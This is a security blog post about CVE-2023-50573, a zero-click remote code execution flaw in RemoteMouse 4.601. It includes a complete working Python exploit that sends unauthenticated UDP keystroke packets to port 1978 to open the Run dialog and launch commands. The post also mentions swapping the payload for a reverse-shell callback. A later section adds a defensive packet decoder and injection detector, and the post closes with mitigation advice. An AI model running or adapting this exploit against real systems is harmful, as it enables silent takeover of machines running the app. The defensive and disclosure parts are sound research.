
Exploiting RemoteMouse (Zero-Click)

Hello folks, today we’re diving into something a bit different: RemoteMouse 4.601, an app that lets you control your PC from an Android device. While controlling your computer from a distance sounds super convenient lol, it also has its downsides. Let’s talk about some serious vulnerabilities that have been uncovered in the app, which could allow an attacker to take over a target system with no user interaction at all. Yeah, you read that right: a zero-click exploit.

CVEs:

  • CVE-2023-50573 Arbitrary Code Execution
  • CVE-2023-51131 Unquoted Service Path

One of these vulnerabilities, CVE-2023-50573, is particularly nasty and dangerous. It allows arbitrary code execution through a service that listens over UDP, and the beauty (and danger) of this bug is that it doesn’t require the victim to do anything: no clicks, no file downloads, none, no, non, nein, nada, nie, net. Just a handful of UDP packets, one per keystroke. So let’s break it down.

The Vulnerability: CVE-2023-50573 – Arbitrary Code Execution

In version 4.601 of RemoteMouse the problem sits in the UDP-based communication between the phone app and the PC server: the server accepts key-event packets from anyone who can reach it, with no handshake and no credential, and the exploit below simply speaks that protocol directly (the only transformation applied to typed characters is a fixed XOR, which is obfuscation, not protection). An attacker who sends crafted UDP packets to the target system can therefore make the server type whatever they want, which is enough to open the Run dialog and launch a command. That is arbitrary code execution leading to complete control of the victim’s machine without any user interaction, and that’s the heart of the zero-click exploit.

Exploitation?

To exploit this vulnerability, attackers don’t need to trick the user into clicking anything or opening a file. All they need is the ability to deliver UDP datagrams to port 1978 on the vulnerable target. Once the packets hit the server, it replays them as keystrokes, so the attacker can run arbitrary commands and, from there, take full control of the system.

Lab Setup

  • VM: Windows 10 22H2
  • RemoteMouse 4.601 installed on the VM
  • Windows 10 22H2 host
  • Python or a C++ toolchain installed on the host


Exploit

import socket
import enum
import re
import time
import argparse

# RemoteMouse listens for key events on UDP/1978. Each datagram is the literal
# text "key", a space-padded decimal length of the payload, then the payload.
REMOTEMOUSE_PORT = 1978

class Keycodes(enum.Enum):
    # Names on the left are what you write in the command string ([WIN], [ENTER]);
    # values on the right are the tokens RemoteMouse expects on the wire.
    WIN = "WIN"
    DELETE = "DELETE"
    ENTER = "RTN"

class RemoteMouseExploit:
    def __init__(self, target_ip):
        self.target_ip = target_ip
        # Splits a command string into literal text and [KEY] / [MOD+KEY] tokens.
        self.re_keycodes = re.compile(r"(\[.*?\])")

    def char2pkt(self, s):
        # A printable character travels as "[ras]<ord(c) XOR 53>"; the XOR is
        # obfuscation only, there is no key and no authentication.
        i = ord(s) ^ 53
        rhs = "[ras]{}".format(i)
        return "key  {}{}".format(len(rhs), rhs)

    def special2pkt(self, kc):
        # A special key travels as its bare token, e.g. "key  3RTN".
        return "key  {}{}".format(len(kc.value), kc.value)

    def combo2pkt(self, s, kc):
        # A key with modifiers is "[kld]<key>[*]<mod>[*]<mod>...", e.g. "[kld]R[*]WIN".
        if isinstance(s, Keycodes):
            s = s.value
        elif len(s) != 1:
            s = Keycodes[s].value
        if not isinstance(kc, list):
            kc = [kc]
        modifiers = '[*]' + '[*]'.join([k.value for k in kc])
        rhs = "[kld]{}{}".format(s, modifiers)
        return "key {}{}".format(len(rhs), rhs)

    def parse_cmd(self, s):
        pkts = []
        for tok in re.split(self.re_keycodes, s):
            if not (tok.startswith('[') and tok.endswith(']')):
                # Literal text: one datagram per character.
                pkts += [self.char2pkt(c) for c in tok]
                continue

            if '+' in tok:
                # [WIN+R]: the last element is the key, everything before it a modifier.
                cmds = tok[1:-1].split('+')
                parsed_cmds = [Keycodes[cmd] if cmd in Keycodes.__members__ else cmd for cmd in cmds]
                pkts.append(self.combo2pkt(parsed_cmds[-1], parsed_cmds[:-1]))
                continue

            pkts.append(self.special2pkt(Keycodes[tok[1:-1]]))

        return pkts

    def send_exploit(self, pkts):
        print("[*] INFO: Sending exploit to", self.target_ip)
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            for pkt in pkts:
                # Short pause so the server processes the keystrokes in order.
                time.sleep(0.08)
                print("[*] INFO: Sending '{}'".format(pkt))
                sock.sendto(pkt.encode('utf-8'), (self.target_ip, REMOTEMOUSE_PORT))
        finally:
            sock.close()


# Usage
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='Send exploit payloads to RemoteMouse servers',
        epilog="Zero-Click RCE. Example: python exploit.py 192.168.26.128 '[WIN+R]calc.exe[DELETE][ENTER]'")
    parser.add_argument('target_ip', type=str, help='IP address of the target')
    parser.add_argument('command', type=str, help='Command to execute')
    args = parser.parse_args()

    exploit = RemoteMouseExploit(args.target_ip)
    cmd_pkts = exploit.parse_cmd(args.command)
    print("[*] INFO: Executing '{}' against {} running on Windows (Unencrypted session)".format(args.command, args.target_ip))
    exploit.send_exploit(cmd_pkts)

Run the exploit above after installing RemoteMouse on the VM, and make sure you run it from the host against the VM’s IP address (192.168.26.128 in the usage example is just the lab VM).


After this the exploit should open the Run dialog and then launch calc.exe, which means our exploit executed successfully. If we replace calc.exe in the command string with something that calls back to us, the same keystroke-injection primitive gives us a reverse shell.


Why is This Dangerous?

This vulnerability has a remote attack vector, meaning the attacker doesn’t need to be anywhere near the target machine. Anyone who can deliver these crafted UDP datagrams to port 1978 on the host, from the same LAN or from further away if the port is reachable, can type commands into it. That opens the door to a wide range of malicious activity, from spying on the system to turning it into a bot for further attacks.
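To see the same traffic from the defender’s side, here is a decoder for the datagrams the exploit above emits. It is an added example written for this post, not part of the original exploit or of RemoteMouse. It assumes the framing the encoder above implies, “key” followed by a three-character right-aligned decimal length and then the payload, and it reverses the ord(c) ^ 53 obfuscation of typed characters. The sample datagrams are hand-encoded from the exploit’s ‘[WIN+R]calc.exe[DELETE][ENTER]’ command, not captured traffic, and the detection heuristic (a WIN-modified combo followed by typed text and an RTN) is this example’s own choice.

```python
"""Decoder / detector for RemoteMouse 'key' datagrams as produced by the exploit above."""
import socket

PORT = 1978     # port the exploit above targets
KEY_XOR = 53    # the exploit sends printable characters as ord(c) ^ 53

# Constructed sample (hand-encoded, not captured): what the exploit above emits
# for '[WIN+R]calc.exe[DELETE][ENTER]'.
SAMPLE_DATAGRAMS = [
    b"key 12[kld]R[*]WIN",   # [WIN+R]
    b"key  7[ras]86",        # c
    b"key  7[ras]84",        # a
    b"key  7[ras]89",        # l
    b"key  7[ras]86",        # c
    b"key  7[ras]27",        # .
    b"key  7[ras]80",        # e
    b"key  7[ras]77",        # x
    b"key  7[ras]80",        # e
    b"key  6DELETE",         # [DELETE]
    b"key  3RTN",            # [ENTER]
]


def parse_frame(datagram):
    """Return the payload of a 'key' frame, or None if the frame is not well formed.

    Assumption: 'key' + 3-char right-aligned decimal length + payload, which is the
    shape the encoder above produces ('key  7...', 'key 12...').
    """
    if len(datagram) < 6 or not datagram.startswith(b"key"):
        return None
    length_field = datagram[3:6].decode("ascii", "replace").strip()
    if not length_field.isdigit():
        return None
    payload = datagram[6:]
    if len(payload) != int(length_field):
        return None
    return payload.decode("latin-1")


def decode_payload(payload):
    """Map one payload to a (kind, value) event: typed char, modifier combo or special key."""
    if payload.startswith("[ras]") and payload[5:].isdigit():
        return ("char", chr(int(payload[5:]) ^ KEY_XOR))
    if payload.startswith("[kld]"):
        key, *mods = payload[5:].split("[*]")   # "[kld]R[*]WIN" -> key "R", mods ["WIN"]
        return ("combo", "+".join(mods + [key]))
    return ("special", payload)


def transcript(datagrams):
    """Rebuild what the server would type, in the exploit's own [KEY] notation."""
    out = []
    for d in datagrams:
        payload = parse_frame(d)
        if payload is None:
            continue                          # ignore non-key / malformed frames
        kind, value = decode_payload(payload)
        out.append(value if kind == "char" else "[{}]".format(value))
    return "".join(out)


def looks_like_injection(datagrams, window=64):
    """Heuristic: a WIN-modified combo (WIN+R opens the Run box) followed within
    `window` datagrams by typed characters and an RTN is treated as command injection."""
    events = [decode_payload(p) for p in map(parse_frame, datagrams) if p is not None]
    for i, (kind, value) in enumerate(events):
        if kind == "combo" and "WIN" in value.split("+"):
            tail = events[i + 1:i + 1 + window]
            typed = any(k == "char" for k, _ in tail)
            entered = any(k == "special" and v == "RTN" for k, v in tail)
            if typed and entered:
                return True
    return False


def listen(bind_ip="0.0.0.0", port=PORT, max_datagrams=None):
    """Sensor loop: decode datagrams arriving on UDP/1978. Run it on a spare host or
    honeypot, not on a box where RemoteMouse already owns the port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    seen = []
    while max_datagrams is None or len(seen) < max_datagrams:
        data, peer = sock.recvfrom(4096)
        seen.append(data)
        payload = parse_frame(data)
        if payload is not None:
            print("{} -> {}".format(peer[0], decode_payload(payload)))
        if looks_like_injection(seen):
            print("[!] possible keystroke injection from {}: {}".format(peer[0], transcript(seen)))
    return seen


if __name__ == "__main__":
    print(transcript(SAMPLE_DATAGRAMS))           # [WIN+R]calc.exe[DELETE][RTN]
    print(looks_like_injection(SAMPLE_DATAGRAMS))  # True
```

Because the protocol carries no session or credential, there is nothing in a single datagram that separates the real phone app from an attacker; the only useful signal is the behaviour of the stream (a Run-box combo followed by a typed command), which is why the heuristic works on the sequence rather than on individual packets.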

Final Thoughts

Zero-click vulnerabilities are some of the most dangerous bugs out there because they don’t require the victim to take any action. This RemoteMouse vulnerability is a perfect example of how an attacker can gain control of a system with a handful of unauthenticated network packets. While RemoteMouse is a cool tool for remote control, this bug is a good reminder of the importance of network security and keeping our systems patched: until you are on a fixed version, don’t expose UDP 1978 beyond the networks you trust, and treat unexpected traffic to that port as hostile.

Special Thanks

  • Rémi GASCOU (@Podalirius): his previous research on RemoteMouse-3.008-Exploit made me do a case study of this vulnerability in depth, and his exploit made me understand the nature of the vulnerability and write a C exploit for it
  • Paolo Stagno (@VoidSec)
  • M. Akil Gündoğan (@akilgundogan)

References:

  • Exploit (Python): https://github.com/p0dalirius/RemoteMouse-3.008-Exploit
  • RemoteMouse (vendor website)
  • Blog: https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/
  • CVE-2023-50573

Also, this blog post is limited for now; the media files, including a proper video of the CVE and the exploit file, I will upload soon.

This post is licensed under CC BY 4.0 by the author.